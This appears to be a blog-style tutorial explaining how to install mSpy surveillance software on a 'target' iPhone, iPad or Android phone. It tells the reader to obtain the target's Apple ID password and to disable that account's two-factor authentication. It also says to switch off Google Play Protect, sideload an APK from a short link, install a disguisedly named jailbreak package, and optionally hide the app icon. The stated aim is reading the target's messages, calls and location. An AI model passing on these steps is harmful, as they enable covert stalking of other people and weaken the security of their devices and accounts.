As said, mSpy is available for both Android Smartphones and iPhone/iPad. In both devices, it’s easy to install the tool. If we take the case of iPhone, you have two options — depending on whether your iPhone/iPad is jailbroken or not. Now, we will give you the detailed instructions to install mSpy on a targeted iPhone and Android.
#1 Install mSpy on iPhone/iPad — without Jailbreaking
You can use this method to install mSpy in an iPhone or iPad, without actually jailbreaking the device. Before we begin, make sure that,
1. You have enabled iCloud Backup has been enabled on the iPhone or iPad. To do this, Go to Settings→iCloud→Backup→ and enable iCloud Backup.
2. Physical access to target device is required if monitored Apple ID has Two-Factor Authentication enabled.
*We strongly recommend you to disable 2-factor authentication for your target Apple ID otherwise physical access will be required for each information update. To disable it: Get target phone > log in to appleid.com > security > disable two-factor authentication > follow instructions.*
3. You have obtained the corresponding Apple ID, which is associated with the iPad/iPhone.
Go to www.mspyonline.com and log in using your credentials.
Once you are in the Dashboard, click on the ‘Set Up New Phone’ button on the left-top section.
Here, you have to select the device you want to monitor. From the list, choose iPhone (no Jailbreak)
In the next screen, you will be asked to enable iCloud Backup and to obtain Apple ID. Click Proceed if you’ve done both.
Now, you will be asked to provide the Apple ID credentials. Hit the Verify button to continue.
In a few seconds, you can see the name of the iPhone/iPad, along with the last date of update.
Click on Proceed button to continue.
That’s it. All the supported logs from the iPad/iPhone will be visible in your mSpy Dashboard in a while.
As we said, you will be able to track a lot of information, such as Call Logs, SMSs and WhatsApp messages.
#2 Install mSpy on iPad/iPhone — with Jailbreaking
This is the easiest method if you’ve already jailbroken your iPhone/iPad. Jailbreaking is a method to bypass restrictions set by Apple.
Make sure that you have unlocked the device and connected to the Internet.
From the app menu, open Cydia.
Choose Sources tab from the coming interface.
In the next window, select the Edit button on the right side.
Hit the Add button.
In the upcoming pop-up window, type the following address.
Click the Add Source button to continue.
- Open the Cydia app again and go to Sources tab.
- Select Mtechnology LTD Repository from the list.
- Choose All Packages from the upcoming screen.
- From the list of options that you see next, choose iPhoneInternalService.
- Hit the Install button on next screen.
- Tap on ‘Confirm’ to continue.
- In a few seconds, you can see the Complete window and restart the springboard as shown in the image below.
- Now onwards, mSpy app would be visible on the home screen. Open the app to continue.
- Tap the Continue button for initial set-up.
- Accept the User License Agreement to continue.
- Now, you will have to choose some options regarding Legal Policy.
- First, you have to provide the reason why you’re using mSpy.
- Second, you need to decide whether you need to keep the mSpy icon on home screen.
- Now, you have to provide the Registration Code.
- Tap the ‘Complete Registration’ button to continue.
- That’s it! You have successfully installed and set up mSpy on your jailbroken iPhone or iPad. In this method, you have complete options for tracking, including GPS Location Tracking.
#3 Install mSpy on Android
When compared to iPhone/iPad installation, mSpy installation on Android is simple! You just have to follow some easy steps to do that.
1. Take your Android device in your hand and unlock it. Make sure that it’s connected to the Internet.
2. Go to Settings >Security and tick Unknown Sources button in the upcoming window.
3. Now, go to Settings > Security > Google Play Protect and untick the option named ‘Google Play Protect’.
4. Now, open http://b55y.net/a via Google Chrome. You will have to enter the CAPTCHA code and the APK file will be downloaded.
5. Go Back to Home Screen and launch All Apps menu (list of all available applications). Open Downloads folder. Tap on bt.apk file to start installation. If you don't see the Downloads folder, try to swipe down from the top of the screen and check bt.apk in recent downloads. If you see a pop-up Complete action using, choose Package Installer and click Always.
6. After opening the bt.apk file, you will need to follow the sequence: Next → Install → Open
7. Once the installation is complete, tap the Open button to start mSpy. Hit the Continue button and Accept Legal Terms in the next screens. In the next dialogue box, you have to hit the Activate button. You have to enter the Registration Code that you’ve received from the mSpy Online website. Hit the Complete Registration button to finalize installation of mSpy.
It’s quite simple, isn’t it? Now onwards, all the tracking logs will be visible on mSpy Online Dashboard. Always make sure that you’re under the legal boundaries of mSpy usage.